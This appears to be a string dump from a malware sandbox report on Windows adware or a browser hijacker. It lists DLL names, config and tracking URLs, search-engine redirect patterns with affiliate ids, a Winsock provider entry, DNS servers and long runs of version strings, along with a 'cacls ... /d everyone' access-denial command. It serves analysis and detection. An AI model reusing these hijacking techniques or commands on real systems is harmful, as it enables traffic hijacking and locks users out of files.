(srv03_sp2_qfe.090303-1204)</pre><pre>6.00.3790.4504 (srv03_sp2_gdr.090428-1405)</pre><pre>6.00.3790.4504 (srv03_sp2_qfe.090428-1405)</pre><pre>6.00.3790.4539 (srv03_sp2_gdr.090626-1428)</pre><pre>6.00.3790.4539 (srv03_sp2_qfe.090626-1428)</pre><pre>6.00.3790.4589 (srv03_sp2_gdr.090914-1233)</pre><pre>6.00.3790.4589 (srv03_sp2_qfe.090914-1233)</pre><pre>6.00.3790.4672 (srv03_sp2_gdr.100225-1230)</pre><pre>6.00.3790.4672 (srv03_sp2_qfe.100225-1230)</pre><pre>6.00.3790.4696 (srv03_sp2_gdr.100419-1942)</pre><pre>6.00.3790.4732 (srv03_sp2_gdr.100623-0356)</pre><pre>6.00.3790.4732 (srv03_sp2_qfe.100623-0356)</pre><pre>6.00.3790.4772 (srv03_sp2_gdr.100908-1010)</pre><pre>6.00.3790.4772 (srv03_sp2_qfe.100908-1010)</pre><pre>6.00.3790.4795 (srv03_sp2_qfe.101103-0357)</pre><pre>6.00.3790.4807 (srv03_sp2_gdr.101220-0307)</pre><pre>6.00.3790.4807 (srv03_sp2_qfe.101220-0307)</pre><pre>6.00.3790.4835 (srv03_sp2_gdr.110222-0239)</pre><pre>6.00.3790.4835 (srv03_sp2_qfe.110222-0239)</pre><pre>6.00.3790.4857 (srv03_sp2_gdr.110425-0335)</pre><pre>6.00.3790.4857 (srv03_sp2_qfe.110425-0335)</pre><pre>6.00.3790.4879 (srv03_sp2_gdr.110621-0342)</pre><pre>6.00.3790.4879 (srv03_sp2_qfe.110621-0342)</pre><pre>6.00.3790.4904 (srv03_sp2_gdr.110905-0334)</pre><pre>6.00.3790.4904 (srv03_sp2_qfe.110905-0334)</pre><pre>6.00.3790.4929 (srv03_sp2_gdr.111104-0342)</pre><pre>6.00.3790.4929 (srv03_sp2_qfe.111104-0342)</pre><pre>6.00.3790.4944 (srv03_sp2_gdr.111216-0308)</pre><pre>6.00.3790.4944 (srv03_sp2_qfe.111216-0308)</pre><pre>6.00.3790.4969 (srv03_sp2_gdr.120228-0234)</pre><pre>6.00.3790.4969 (srv03_sp2_qfe.120228-0234)</pre><pre>6.00.3790.5004 (srv03_sp2_gdr.120515-0336)</pre><pre>6.00.3790.5004 (srv03_sp2_qfe.120515-0336)</pre><pre>6.00.3790.5029 (srv03_sp2_gdr.120628-0335)</pre><pre>6.00.3790.5029 (srv03_sp2_qfe.120628-0335)</pre><pre>6.00.3790.5060 (srv03_sp2_gdr.120824-0334)</pre><pre>6.00.3790.5060 (srv03_sp2_qfe.120824-0334)</pre><pre>6.00.3790.5080 (srv03_sp2_gdr.121026-1534)</pre><pre>6.00.3790.5080 (srv03_sp2_qfe.121026-1534)</pre><pre>HTTP/1.</pre><pre>HTTP/1.1 302 Moved Temporarily</pre><pre>http://www.baidu.com/s? tn=</pre><pre>http://www.baidu.com/</pre><pre>http://www.sogou.com/sogou? pid=</pre><pre>http://www.sogou.com/index. pid=</pre><pre>http://rlt.inte.sogou.com/</pre><pre><html><head><meta http-equiv="refresh" content="0;url=</pre><pre>[i 1]){b.href=</pre><pre>[i]==b.id){if (b.href!=</pre><pre>.length;i =2){if (</pre><pre>&cmv=X</pre><pre>window.sogou_adclk</pre><pre>http://www.baidu.com/ tn=-wd=-word=</pre><pre>tn=%s</pre><pre>http://www.hao123.com/ tn=</pre><pre>.google.com</pre><pre>pv.sogou.com</pre><pre>pb.sogou.com</pre><pre>.tanghulu.cc</pre><pre>.zclm8.com</pre><pre>.wq581.com</pre><pre>.maimeng8.com</pre><pre>.5sla.com</pre><pre>.wb360.net</pre><pre>.renren.com</pre><pre>.jj123.com.cn</pre><pre>.iwb110.com</pre><pre>.wb12318.com</pre><pre>.woai310.com</pre><pre>.58lianmeng.com</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>.text</pre><pre>FILE_EXECUTE</pre><pre>FILE_GENERIC_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>C:\DOCUME~1\" %CurrentUserName% /></head></html></pre><pre>" link="http://www.sogou.com/sogou?pid=%s&query=%%s" icon="207" /></pre><pre>param:%s</pre><pre>[%s],</pre><pre>call entry ret:%d</pre><pre>entry addr:X %s</pre><pre>%s addr:X %s</pre><pre>(%d).%s</pre><pre>run_rate :%d</pre><pre>ip_addr :%s</pre><pre>ngroup :%d</pre><pre>cfg_file :%s</pre><pre>bin_file :%s</pre><pre>root_path:%s</pre><pre>igroup :%d</pre><pre>ini :X</pre><pre>kvs :X</pre><pre>gkvs :X</pre><pre>user :%s</pre><pre>hWnd :X</pre><pre>%s%sX%s</pre><pre>CreateExeShortcut Save To:%s</pre><pre>CreateExeShortcut nIndex:%d</pre><pre>CreateExeShortcut pszArgs:%s</pre><pre>CreateExeShortcut pszExeFile:%s</pre><pre>CreateExeShortcut pszWorkerDir:%s</pre><pre>CreateExeShortcut pszDescription:%s</pre><pre>CreateExeShortcut QueryInterface IID_IPersistFile ok</pre><pre>CreateExeShortcut pLink:X</pre><pre>PostClientInfo_Thread:X</pre><pre>,bRet:%d StatusCode:%d</pre><pre>www.dskjkl.com</pre><pre>First_PostClientInfo_Thread:X</pre><pre>/sp/callnew.aspx?</pre><pre>www.58lianmeng.com</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>ddddddd</pre><pre>010203040506</pre><pre>.text</pre><pre>`.bss</pre><pre>.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.dll</pre><pre>.rsrc</pre><pre>.data</pre><pre>kernel32.dll</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><pre>GetProcAddress PackTheFile OK Addr:X</pre><pre>GetProcAddress SetFlags OK Addr:X</pre><pre>kind:X posguid:X</pre><pre>MSFT_TypeInfoBase Size:%d</pre><pre>MSFT_Header Size:X</pre><pre>bGetClsID:%d bGetIID:%d</pre><pre>GetClsIDAndIIDFromModuleHandle bRet:%d</pre><pre>TypeLib Res size:%d</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>RegCloseKey</pre><pre>RegCreateKeyA</pre><pre>HttpOpenRequestA</pre><pre>HttpQueryInfoA</pre><pre>HttpSendRequestA</pre><pre>`.rdata</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHELL32.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>P2PRun.dll</pre><b>EXE_temp3.exe_816_rwx_00ED0000_00009000:</b><pre>.text</pre><pre>`.bss</pre><pre>.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.dll</pre><pre>.rsrc</pre><pre>.data</pre><pre>kernel32.dll</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><b>EXE_temp3.exe_816_rwx_010E1000_00031000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>USER32.dll</pre><pre>ADVAPI32.dll</pre><pre>PSAPI.DLL</pre><pre>Length:%d opcode X offset:%d</pre><pre>lnc.HtM</pre><pre>.sOE?</pre><pre>S.py.q|8X</pre><pre>f:MSG</pre><pre>%S-v,</pre><pre>;/K.CV</pre><pre>7.tajD</pre><pre>.vvn|</pre><pre>.5!.gk</pre><pre>KERNEL32.DLL</pre><pre>GDI32.dll</pre><pre>iphlpapi.dll</pre><pre>ole32.dll</pre><pre>SHELL32.dll</pre><pre>SHLWAPI.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>UrlUnescapeA</pre><pre>InternetCrackUrlA</pre><pre>DeskIcon.dll</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>.rsrc</pre><pre>Z.WrR</pre><pre>.OD'qg</pre><pre>x%X@0</pre><pre>COMCTL32.dll</pre><pre>MFC42.DLL</pre><pre>MSVCP60.dll</pre><pre>MSVCRT.dll</pre><pre>OLEAUT32.dll</pre><pre>VERSION.dll</pre><pre>RegOpenKeyA</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>@.reloc</pre><pre>Microsoft(R) Windows(R) Operating System</pre><pre>6, 0, 2900, 5512</pre><pre>6.00.2900.5512</pre><b>EXE_temp3.exe_816_rwx_01120000_00023000:</b><pre>lnc.HtM</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>-id:%u -cfg:%s</pre><pre>%u=%s</pre><pre>%s%s.ico</pre><pre>http://www.58lianmeng.com/sp/call.aspx?username=</pre><pre>http://icon.woai310.com/client/config.ini</pre><pre>%s%s.exe</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>xxxxxx</pre><pre>_WINICOMSG_</pre><pre>ATL:X</pre><pre>127.0.0.1</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)</pre><pre>http://s.click.taobao.com/t_js?tu=</pre><pre>detail.tmall.com</pre><pre>application/x-www-form-urlencoded</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>http://icon.woai310.com/?do=post&u=%s&m=%s&c=%d&s=%d&k=1&r=%s&v=%s&p=%s</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetCPInfo</pre><pre>GetProcessHeap</pre><pre>UrlUnescapeA</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>.QQzH</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>.5!.gk</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>GDI32.dll</pre><pre>iphlpapi.dll</pre><pre>ole32.dll</pre><pre>SHELL32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>DeskIcon.dll</pre><b>EXE_temp3.exe_816_rwx_10001000_0002E000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>PSAPI.DLL</pre><pre>i4VO.Wn}}4</pre><pre>uJ 9%d</pre><pre>s%F'`f</pre><pre>vp%Cl }F.</pre><pre>.Lu.-$ A</pre><pre>>%FZ7~</pre><pre>.DcPn%*</pre><pre>HN6.QK</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>iphlpapi.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>Base:X</pre><pre>DLL_PROCESS_ATTACH %d</pre><pre>Length:%d opcode X offset:%d</pre><pre>MsgDebugView</pre><pre>%System%\DqKgbb.dll</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><b>objs.exe_3332_rwx_00401000_0001E000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>OLEACC.dll</pre><pre>PSAPI.DLL</pre><pre>phlpapi.dll</pre><pre>127.0.0.1</pre><pre>msvcrt</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>http://get.woai310.com/getconfig/minisite.ini</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>http://</pre><pre>WebClientWindow</pre><pre>WebBrowserPointer</pre><pre>http://site.minimenhu.com/sh/index.html</pre><pre>%WinDir%\share\rsvp\objs.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>UrlUnescapeA</pre><pre>EnumChildWindows</pre><pre>EnumWindows</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>O.qul5</pre><b>objs.exe_3332_rwx_00950000_00053000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>iexplore.exe</pre><pre>%Program Files%\Internet Explorer\iexplore.exe</pre><pre>explorer.exe</pre><pre>igfxsrvc.exe</pre><pre>{5D562E5F-741F-4b50-AB7B-7A997CEB9557}</pre><pre>{XXXX-XX-XX-XX-XXXXXX}</pre><pre>cacls.exe "%s" /e /d everyone</pre><pre>%Program Files%\E-yoo\EyooSechelper2.dll</pre><pre>http://</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>Software\Microsoft\Windows\ShellNoRoam\TempCache</pre><pre>Software\Microsoft\Windows\ShellNoRoam\ShellCache</pre><pre>herollq.exe</pre><pre>WebPlayer2010.exe</pre><pre>VODPlayer.exe</pre><pre>JSKPBrowser.exe</pre><pre>ValeBrowser.exe</pre><pre>wmconfig.exe</pre><pre>NewBho.DLL</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object</pre><pre>software\policies\microsoft\windows nt\dnsclient</pre><pre>ws2_32.dll</pre><pre>ole32.dll</pre><pre>ieui.dll</pre><pre>mshtml.dll</pre><pre>IEFrame.dll</pre><pre>iertutil.dll</pre><pre>User32.dll</pre><pre>SHLWAPI.dll</pre><pre>wininet.dll</pre><pre>urlmon.dll</pre><pre>mswsock.dll</pre><pre>ws2help.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>NtQueryValueKey</pre><pre>NtOpenKey</pre><pre>ADVAPI32.dll</pre><pre>ntdll.dll</pre><pre>Kernel32.dll</pre><pre>dnsapi.dll</pre><pre>msvcrt</pre><pre>PubwinClient.exe</pre><pre>RunMe.exe</pre><pre>{11F09AFE-75AD-4E52-AB43-E09E9351CE17}</pre><pre>Shell.User\Group</pre><pre>oleaut32.dll</pre><pre>browseti.dll</pre><pre>hinthk.dll</pre><pre>zclm8.com</pre><pre>wq581.com</pre><pre>maimeng8.com</pre><pre>5sla.com</pre><pre>wb360.net</pre><pre>renren.com</pre><pre>jj123.com.cn</pre><pre>wb12318.com</pre><pre>iwb110.com</pre><pre>woai310.com</pre><pre>http://123.sogou.com</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.sogou.com/index</pre><pre>.info</pre><pre>http://baidu.com</pre><pre>{X-X-x-XX-XXXXXX}</pre><pre>www.soso.com</pre><pre>www.google.com</pre><pre>www.hao123.com</pre><pre>www.tao123.com</pre><pre>www.baidu.com</pre><pre>123.sogou.com</pre><pre>www.sogou.com</pre><pre>www.iwb110.com</pre><pre>rpcrt4.dll</pre><pre>kernel32.dll</pre><pre>{xxxx-xx-xx-xx-xxxxxx}</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.8.8</pre><pre>8.8.8.9</pre><pre>8.8.4.4</pre><pre>Shell.Dusn</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}</pre><pre>xxxxxx</pre><pre>http://www.baidu.com/adrc.php?</pre><pre>http://www.baidu.com/baidu.php?</pre><pre>http://www.baidu.com/s?</pre><pre>http://www.hao123.com/?</pre><pre>http://123.sogou.com/?</pre><pre>http://www.sogou.com/img/fav.ico?</pre><pre>http://pv.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/cl.gif?</pre><pre>http://www.google.com/aclk?</pre><pre>http://www.sogou.com/bill_</pre><pre>http://www.sogou.com/sogou?</pre><pre>http://test.hermes.sogou.com/sa.gif?</pre><pre>http://www.sogou.com/index.htm</pre><pre>118.145.16.80</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>shdocvw.dll</pre><pre>ieframe.dll</pre><pre>http://www.sogou.com/sogou?query=</pre><pre>sogou-netb-xx-d</pre><pre>%%X</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>HttpAddRequestHeaders</pre><pre>\StringFileInfo\xx\%s</pre><pre>user32.dll</pre><pre>6.0.2800.1106</pre><pre>6.00.2600.0000</pre><pre>6.00.2600.0000 (xpclient.010817-1148)</pre><pre>6.00.2737.800</pre><pre>6.00.2800.1106</pre><pre>6.00.2800.1106 (xpsp1.020828-1920)</pre><pre>6.00.2800.1400</pre><pre>6.00.2800.1485</pre><pre>6.00.2800.1496</pre><pre>6.00.2800.1603</pre><pre>6.00.2800.1607</pre><pre>6.00.2800.1611</pre><pre>6.00.2800.1615</pre><pre>6.00.2800.1617</pre><pre>6.00.2800.1623</pre><pre>6.00.2800.1627</pre><pre>6.00.2800.1632</pre><pre>6.00.2800.1644</pre><pre>6.00.2800.1649</pre><pre>6.00.2800.1650</pre><pre>6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)</pre><pre>6.00.2900.2518 (xpsp.040919-1030)</pre><pre>6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)</pre><pre>6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)</pre><pre>6.00.2900.2598 (xpsp.041130-1728)</pre><pre>6.00.2900.2627 (xpsp.050309-1719)</pre><pre>6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)</pre><pre>6.00.2900.2668 (xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)</pre><pre>6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)</pre><pre>6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)</pre><pre>6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)</pre><pre>6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)</pre><pre>6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)</pre><pre>6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)</pre><pre>6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)</pre><pre>6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)</pre><pre>6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)</pre><pre>6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)</pre><pre>6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)</pre><pre>6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)</pre><pre>6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)</pre><pre>6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)</pre><pre>6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)</pre><pre>6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)</pre><pre>6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)</pre><pre>6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)</pre><pre>6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)</pre><pre>6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)</pre><pre>6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)</pre><pre>6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)</pre><pre>6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)</pre><pre>6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)</pre><pre>6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)</pre><pre>6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)</pre><pre>6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)</pre><pre>6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)</pre><pre>6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)</pre><pre>6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)</pre><pre>6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)</pre><pre>6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)</pre><pre>6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)</pre><pre>6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)</pre><pre>6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)</pre><pre>6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)</pre><pre>6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)</pre><pre>6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)</pre><pre>6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)</pre><pre>6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)</pre><pre>6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)</pre><pre>6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)</pre><pre>6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)</pre><pre>6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)</pre><pre>6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)</pre><pre>6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)</pre><pre>6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)</pre><pre>6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)</pre><pre>6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)</pre><pre>6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)</pre><pre>6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)</pre><pre>6.00.3790.0 (srv03_rtm.030324-2048)</pre><pre>6.00.3790.118 (srv03_gdr.031205-1652)</pre><pre>6.00.3790.118 (srv03_qfe.031205-1652)</pre><pre>6.00.3790.1830 (srv03_sp1_rtm.050324-1447)</pre><pre>6.00.3790.186 (srv03_gdr.040410-1234)</pre><pre>6.00.3790.186 (srv03_qfe.040410-1236)</pre><pre>6.00.3790.2509 (srv03_sp1_gdr.050815-1517)</pre><pre>6.00.3790.2653 (srv03_sp1_gdr.060303-1536)</pre><pre>6.00.3790.2653 (srv03_sp1_qfe.060303-1552)</pre><pre>6.00.3790.2732 (srv03_sp1_gdr.060623-0310)</pre><pre>6.00.3790.2732 (srv03_sp1_qfe.060623-0318)</pre><pre>6.00.3790.2817 (srv03_sp1_gdr.061023-0100)</pre><pre>6.00.3790.2993 (srv03_sp1_gdr.070817-1316)</pre><pre>6.00.3790.2993 (srv03_sp1_qfe.070817-1316)</pre><pre>6.00.3790.3041 (srv03_sp1_gdr.071107-1901)</pre><pre>6.00.3790.3041 (srv03_sp1_qfe.071107-1901)</pre><pre>6.00.3790.3091 (srv03_sp1_gdr.080215-1206)</pre><pre>6.00.3790.3091 (srv03_sp1_qfe.080215-1206)</pre><pre>6.00.3790.3194 (srv03_sp1_gdr.080819-1207)</pre><pre>6.00.3790.3194 (srv03_sp1_qfe.080819-1207)</pre><pre>6.00.3790.3229 (srv03_sp1_gdr.081016-1620)</pre><pre>6.00.3790.3229 (srv03_sp1_qfe.081016-1620)</pre><pre>6.00.3790.3304 (srv03_sp1_gdr.090303-1204)</pre><pre>6.00.3790.3304 (srv03_sp1_qfe.090303-1204)</pre><pre>6.00.3790.3959 (srv03_sp2_rtm.070216-1710)</pre><pre>6.00.3790.4186 (srv03_sp2_gdr.071108-1306)</pre><pre>6.00.3790.4186 (srv03_sp2_qfe.071108-1306)</pre><pre>6.00.3790.4210 (srv03_sp2_qfe.071221-1418)</pre><pre>6.00.3790.4237 (srv03_sp2_gdr.080215-1206)</pre><pre>6.00.3790.4237 (srv03_sp2_qfe.080215-1206)</pre><pre>6.00.3790.4275 (srv03_sp2_gdr.080417-1307)</pre><pre>6.00.3790.4275 (srv03_sp2_qfe.080417-1307)</pre><pre>6.00.3790.4324 (srv03_sp2_qfe.080630-1205)</pre><pre>6.00.3790.4357 (srv03_sp2_gdr.080819-1207)</pre><pre>6.00.3790.4357 